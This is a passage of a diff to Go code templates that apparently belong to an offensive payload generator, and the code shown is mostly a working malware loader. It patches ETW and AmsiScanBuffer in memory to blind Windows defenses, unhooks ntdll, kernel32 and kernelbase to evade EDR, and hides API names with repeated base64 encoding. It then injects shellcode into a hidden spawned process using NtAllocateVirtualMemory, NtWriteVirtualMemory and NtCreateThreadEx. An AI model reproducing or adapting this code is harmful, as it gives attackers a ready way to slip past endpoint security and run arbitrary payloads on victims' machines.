:= {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) + //{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") + {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) } defer {{.Variables.k}}.Close() - {{.Variables.VersionMessage}} - {{.Variables.SyscallNumberlist}} + if {{.Variables.Version}} == "10" { + {{.Variables.customsyscall}} = 0x18 + {{.Variables.customsyscallVP}} = 0x50 + } else if {{.Variables.Version}} == "6.3" { + {{.Variables.customsyscall}} = 0x17 + {{.Variables.customsyscallVP}} = 0x4f + } else if {{.Variables.Version}} == "6.2" { + {{.Variables.customsyscall}} = 0x16 + {{.Variables.customsyscallVP}} = 0x4e + } else if {{.Variables.Version}} == "6.1" { + {{.Variables.customsyscall}} = 0x15 + {{.Variables.customsyscallVP}}= 0x4d + } + return {{.Variables.Version}} } + func {{.Variables.decode}}({{.Variables.b64}} string,) string { var {{.Variables.decoded}} []byte {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) @@ -559,723 +452,194 @@ func Binary() string { } + {{.Variables.Console_Function}} + {{.Variables.WriteProcessMemory_Function}} {{.Variables.ETW_Function}} {{.Variables.AMSI_Function}} - - func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} + + var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory") + + func {{.Variables.FindAddress}}() uintptr { + var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory") + handle := uintptr(0xffffffffffffffff) + num := 2 + var add uintptr + AllAddr := funcNtAllocateVirtualMemory.Addr() + for i := 0; i < 20; i++ { + rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num)) + f := fmt.Sprintf("%0x", rawr) + if f == "0f05" { + add = AllAddr + uintptr(i) + return add + } } - {{.Variables.EDR}} + return add + } + + func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, lpNumberOfBytesRead int, ok bool) { + var nBytesRead int + buf := make([]uint8, nSize) + ret, _, _ := procReadProcessMemory.Call( + uintptr(hProcess), + lpBaseAddress, + uintptr(unsafe.Pointer(&buf[0])), + nSize, + uintptr(unsafe.Pointer(&nBytesRead)), + ) + return buf, nBytesRead, ret != 0 } - + ` + +} + +func DLL_Refresher() string { + return ` + {{.Variables.Header}} + + {{.Variables.ExportName}} + {{.Variables.ExportFunction}} + func main() { + } + + + //export Run + func Run() { {{.Variables.Sandbox}} {{.Variables.ETW}} {{.Variables.AMSI}} - time.Sleep({{.Variables.SleepSecond}} * time.Millisecond) {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() + if {{.Variables.Version}} == "10" { + {{.Variables.Reloading}} } - {{.Variables.ETW}} - {{.Variables.hide}} - {{.Variables.Pointer}} + {{.Variables.ETW}} {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ShellcodeString}} - {{.Variables.ptr}} := func() { - } - var {{.Variables.oldptrperms}} uintptr - {{.Variables.handle}} := uintptr(0xffffffffffffffff) - {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) - var {{.Variables.oldfartcodeperms}} uintptr - {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handle}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldptrperms}}, - ) - if {{.Variables.runfunc}} != 0 { - panic("Call to VirtualProtect failed!") - } - {{.Variables.CopyPointer}} - *(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})) = (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})) - {{.Variables.OverwrittenShellcode}} - - {{.Variables.OverWrittenPoint}} - {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handle}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldfartcodeperms}}, - ) - if {{.Variables.runfunc}} != 0 { - panic("Call to VirtualProtect failed!!!!!") - } - syscall.Syscall(**(**uintptr)(unsafe.Pointer(&{{.Variables.ptr}})),0, 0, 0, 0,) - + {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) } - func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.ReloadingMessage}} - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr - - {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldfartcodeperms}}, - ) - if {{.Variables.runfunc}} != 0 { - } - for i := 0; i < len({{.Variables.bytes}}); i++ { - {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) - {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) - (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] - } - {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - {{.Variables.oldfartcodeperms}}, - &{{.Variables.oldfartcodeperms}}, - ) - return nil - } -` -} -func DLL() string { - return ` - package main + {{.Variables.Shellcode_Exec}} - import "C" - import ( - "encoding/base64" - {{.Variables.HEX_Import}} - "[loader]/[loader]" - "strconv" - "syscall" - "unsafe" - {{.Variables.SandboxOS}} - - {{.Variables.Windows_Import}} - "golang.org/x/sys/windows/registry" + {{.Variables.ReloadFunction}} - ) - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} - ) - - - {{.Variables.Sandboxfunction}} - - func {{.Variables.Versionfunc}}() { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - - } - func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - - } - - {{.Variables.WriteProcessMemory_Function}} - - {{.Variables.ETW_Function}} - - {{.Variables.AMSI_Function}} - - func main() { - } - - {{.Variables.ExportName}} - - - //export Run - func Run() { - {{.Variables.Sandbox}} - {{.Variables.Versionfunc}}() - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - var {{.Variables.phandle}} uint64 - var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr - {{.Variables.phandle}} = 0xffffffffffffffff - {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) - {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) - {{.Variables.protect}} = 0x40 - {{.Variables.alloctype}} = 0x3000 - {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) - {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) - for x, y := range []byte({{.Variables.raw_bin}}) { - {{.Variables.buff}} [x] = y - } - syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0) - } - ` } -func WriteProcessMemory_Function() string { - return ` - const ( - {{.Variables.errnoERROR_IO_PENDING}}= 997 - ) - var {{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}}) - var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.WriteProcessMemoryName}}")) - - - func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) { - r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0) - if r1 == 0 { - if e1 != 0 { - err = {{.Variables.errnoErr}}(e1) - } else { - err = syscall.EINVAL - } - } - return - } - - func {{.Variables.errnoErr}}(e syscall.Errno) error { - switch e { - case 0: - return nil - case {{.Variables.errnoERROR_IO_PENDING}}: - return {{.Variables.errERROR_IO_PENDING}} - } - - return e - } - ` -} - -func WindowsVersion_Syscall() string { - return ` - if {{.Variables.Version}} == "10.0" { - {{.Variables.customsyscall}} = 0x18 - {{.Variables.customsyscallVP}} = 0x50 - } else if {{.Variables.Version}} == "6.3" { - {{.Variables.customsyscall}} = 0x17 - {{.Variables.customsyscallVP}} = 0x4f - } else if {{.Variables.Version}} == "6.2" { - {{.Variables.customsyscall}} = 0x16 - {{.Variables.customsyscallVP}} = 0x4e - } else if {{.Variables.Version}} == "6.1" { - {{.Variables.customsyscall}} = 0x15 - {{.Variables.customsyscallVP}}= 0x4d - } - return {{.Variables.Version}} -` -} - -func WindowsVersion_Syscall_Unmod() string { - return ` - if {{.Variables.Version}} == "10.0" { - {{.Variables.customsyscall}} = 0x18 - } else if {{.Variables.Version}} == "6.3" { - {{.Variables.customsyscall}} = 0x17 - } else if {{.Variables.Version}} == "6.2" { - {{.Variables.customsyscall}} = 0x16 - } else if {{.Variables.Version}} == "6.1" { - {{.Variables.customsyscall}} = 0x15 - } -` -} - -func ETW_Function() string { - return ` - var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwNotificationRegisterName}}")) - var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventRegisterName}}")) - var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteFullName}}")) - var {{.Variables.procEtwEventWrite}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteName}}")) - - func {{.Variables.ETW}}() { - {{.Variables.handle}} := uintptr(0xffffffffffffffff) - {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} - for i, _ := range {{.Variables.dataAddr}} { - {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") - var {{.Variables.nLength}} uintptr - {{.Variables.datalength}} := len({{.Variables.data}}) - {{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) - } - } - -` -} - -func AMSI_Function() string { - return ` - func {{.Variables.AMSI}}() { - var {{.Variables.handle}} uint64 - {{.Variables.handle}} = 0xffffffffffffffff - {{.Variables.ll}}, _ := windows.LoadLibrary("amsi.dll") - {{.Variables.addr}}, _ := windows.GetProcAddress({{.Variables.ll}}, "AmsiScanBuffer") - {{.Variables.data}}, _ := hex.DecodeString("B857000780C3") - var {{.Variables.nLength}} uintptr - {{.Variables.datalength}} := len({{.Variables.data}}) - {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), uintptr(uint({{.Variables.addr}})), &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) - } - ` -} - -func Procces_Injection_DLL() string { - return ` - package main - - import "C" - - import ( - - "debug/pe" - "encoding/base64" - "encoding/hex" - "fmt" - "[loader]/[loader]" - "io/ioutil" - "syscall" - "time" - "unsafe" - "strconv" - - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - -const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF -) -var _ unsafe.Pointer -var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.Version}} string - {{.Variables.number}} int = {{.Variables.b64number}} -) - - -var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc("WriteProcessMemory") -var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtCreateThreadEx") -var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtWriteVirtualMemory") -var {{.Variables.funcNtAllocateVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtAllocateVirtualMemory") -var {{.Variables.funcNtProtectVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtProtectVirtualMemory") - -var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("EnumProcessModules") -var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleBaseNameW") -var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleInformation") - - -func errno(e1 error) error { - if e1, ok := e1.(syscall.Errno); ok && e1 == 0 { - e1 = syscall.EINVAL - } - return e1 -} - -type SyscallError struct { - call string - err error -} - -func (e *SyscallError) Error() string { - return fmt.Sprintf("%s: %v", e.call, e.err) -} - -const ( - MEM_FREE = 0x100 << 8 - MEM_COMMIT = 0x10 << 8 - MEM_RESERVE = 0x20 << 8 -) - -type StartupInfoEx struct { - windows.StartupInfo - AttributeList *PROC_THREAD_ATTRIBUTE_LIST -} -type PROC_THREAD_ATTRIBUTE_LIST struct { - dwFlags uint32 - size uint64 - count uint64 - reserved uint64 - unknown *uint64 - entries []*PROC_THREAD_ATTRIBUTE_ENTRY -} -type PROC_THREAD_ATTRIBUTE_ENTRY struct { - attribute *uint32 - cbSize uintptr - lpValue uintptr -} - -type MemoryBasicInfo struct { - BaseAddress uintptr - AllocationBase uintptr - AllocationProtect uint32 - RegionSize uintptr - State uint32 - Protect uint32 - Type uint32 -} - -type MODULEINFO struct { - LpBaseOfDll uintptr - SizeOfImage uint32 - EntryPoint uintptr -} - -func {{.Variables.CreateProcess}}() *syscall.ProcessInformation { - var {{.Variables.si}} syscall.StartupInfo - var {{.Variables.pi}} syscall.ProcessInformation - - {{.Variables.Target}} := "{{.Variables.processpath}}" - {{.Variables.commandLine}}, {{.Variables.err}} := syscall.UTF16PtrFromString({{.Variables.Target}}) - - if {{.Variables.err}} != nil { - panic({{.Variables.err}}) - } - var {{.Variables.startupInfo}} StartupInfoEx - {{.Variables.si}}.Cb = uint32(unsafe.Sizeof({{.Variables.startupInfo}})) - {{.Variables.si}}.Flags |= windows.STARTF_USESHOWWINDOW - {{.Variables.si}}.ShowWindow = windows.SW_HIDE - - {{.Variables.err}} = syscall.CreateProcess( - nil, - {{.Variables.commandLine}}, - nil, - nil, - false, - 0, - nil, - nil, - &{{.Variables.si}}, - &{{.Variables.pi}}) - - if {{.Variables.err}} != nil { - panic({{.Variables.err}}) - } - - return &{{.Variables.pi}} -} -func {{.Variables.GetModuleInformation}}({{.Variables.hProcess}} windows.Handle, {{.Variables.hModule}} windows.Handle) (MODULEINFO, error) { - {{.Variables.mi}} := MODULEINFO{} - _, _, {{.Variables.err}} := {{.Variables.procGetModuleInformation}}.Call( - uintptr({{.Variables.hProcess}}), - uintptr({{.Variables.hModule}}), - uintptr(unsafe.Pointer(&{{.Variables.mi}})), - uintptr(uint32(unsafe.Sizeof({{.Variables.mi}})))) - if {{.Variables.err}}.(syscall.Errno) != 0 { - return {{.Variables.mi}}, {{.Variables.err}} - } - return {{.Variables.mi}}, nil -} - -func {{.Variables.GetModuleBaseName}}({{.Variables.process}} windows.Handle, {{.Variables.module}} windows.Handle, {{.Variables.outString}} *uint16, {{.Variables.size}} uint32) ({{.Variables.n}} int, err error) { - r1, _, e1 := {{.Variables.procGetModuleBaseName}}.Call( - uintptr({{.Variables.process}}), - uintptr({{.Variables.module}}), - uintptr(unsafe.Pointer({{.Variables.outString}})), - uintptr({{.Variables.size}}), - ) - if r1 == 0 { - return 0, errno(e1) - } - return int(r1), nil -} - -func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{.Variables.modules}} []windows.Handle) ({{.Variables.n}} int, {{.Variables.err}} error) { - var {{.Variables.needed}} int32 - const {{.Variables.handleSize}} = unsafe.Sizeof({{.Variables.modules}}[0]) - r1, _, e1 := {{.Variables.procEnumProcessModules}}.Call( - uintptr({{.Variables.process}}), - uintptr(unsafe.Pointer(&{{.Variables.modules}}[0])), - {{.Variables.handleSize}}*uintptr(len({{.Variables.modules}})), - uintptr(unsafe.Pointer(&{{.Variables.needed}})), - ) - if r1 == 0 { - {{.Variables.err}} = errno(e1) - return 0, {{.Variables.err}} - } - {{.Variables.n}} = int(uintptr({{.Variables.needed}}) / {{.Variables.handleSize}}) - return {{.Variables.n}}, nil -} - -func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - -} - - -{{.Variables.Sandboxfunction}} - - -func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - -} - -{{.Variables.WriteProcessMemory_Function}} - -{{.Variables.ETW_Function}} - -{{.Variables.AMSI_Function}} - - -func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - } -} - -func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { - {{.Variables.pi}} := {{.Variables.CreateProcess}}() - time.Sleep(5 * time.Second) - if {{.Variables.Version}} == "10.0" { - {{.Variables.hh}}, {{.Variables.err}} := windows.OpenProcess({{.Variables.PROCESS_ALL_ACCESS}}, false, {{.Variables.pi}}.ProcessId) - if {{.Variables.err}} != nil { - } - {{.Variables.modules}} := make([]windows.Handle, 255) - {{.Variables.n}}, {{.Variables.err}} := {{.Variables.EnumProcessModules}}({{.Variables.hh}}, {{.Variables.modules}}) - if {{.Variables.err}} != nil { - fmt.Println(&SyscallError{"EnumProcessModules", {{.Variables.err}}}) - } - if {{.Variables.n}} < len({{.Variables.modules}}) { - {{.Variables.modules}} = {{.Variables.modules}}[:{{.Variables.n}}] - } - var {{.Variables.buf}} = make([]uint16, 255) - for _, {{.Variables.mod}} := range {{.Variables.modules}} { - {{.Variables.MI}}, _ := {{.Variables.GetModuleInformation}}({{.Variables.hh}}, {{.Variables.mod}}) - {{.Variables.n}}, {{.Variables.err}} := {{.Variables.GetModuleBaseName}}({{.Variables.hh}}, {{.Variables.mod}}, &{{.Variables.buf}}[0], uint32(len({{.Variables.buf}}))) - if {{.Variables.err}} != nil { - } - {{.Variables.s}} := windows.UTF16ToString({{.Variables.buf}}[:{{.Variables.n}}]) - if {{.Variables.s}} == "ntdll.dll" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\ntdll.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - if {{.Variables.s}} == "KERNEL32.DLL" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernel32.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - if {{.Variables.s}} == "KERNELBASE.dll" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernelbase.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - } - } - {{.Variables.shellcode}} := {{.Variables.raw_bin}} - {{.Variables.oldProtect}} := windows.PAGE_READWRITE - var {{.Variables.lpBaseAddress}} uintptr - {{.Variables.size}} := len({{.Variables.shellcode}}) - - {{.Variables.funcNtAllocateVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), 0, uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) - - {{.Variables.funcNtWriteVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, uintptr(unsafe.Pointer(&{{.Variables.shellcode}}[0])), uintptr({{.Variables.size}}), 0) - - {{.Variables.funcNtProtectVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&{{.Variables.oldProtect}}))) - - {{.Variables.funcNtCreateThreadEx}}.Call(uintptr(unsafe.Pointer(&{{.Variables.pi}}.Thread)), windows.GENERIC_EXECUTE, 0, uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, {{.Variables.lpBaseAddress}}, 0, 0, 0, 0, 0) - - syscall.CloseHandle({{.Variables.pi}}.Thread) - -} - -func main() { -} - -{{.Variables.ExportName}} - - -//export Run -func Run() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.Version}} = {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}}) -} - - -func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.name}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(".text") - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.dllBase}} := {{.Variables.addr}} - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.rawbytes}} := fmt.Sprintf("%X", {{.Variables.bytes}}) - {{.Variables.data}}, _ := hex.DecodeString(string({{.Variables.rawbytes}})) - {{.Variables.regionsize}} := len({{.Variables.bytes}}) - {{.Variables.offsetaddr}} := uintptr({{.Variables.dllOffset}}) - var {{.Variables.nLength}} uintptr - {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.offsetaddr}}, &{{.Variables.data}}[0], uintptr(uint32({{.Variables.regionsize}})), &{{.Variables.nLength}}) - - return nil -} - - +func Binary() string { + return ` + {{.Variables.Header}} -func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := 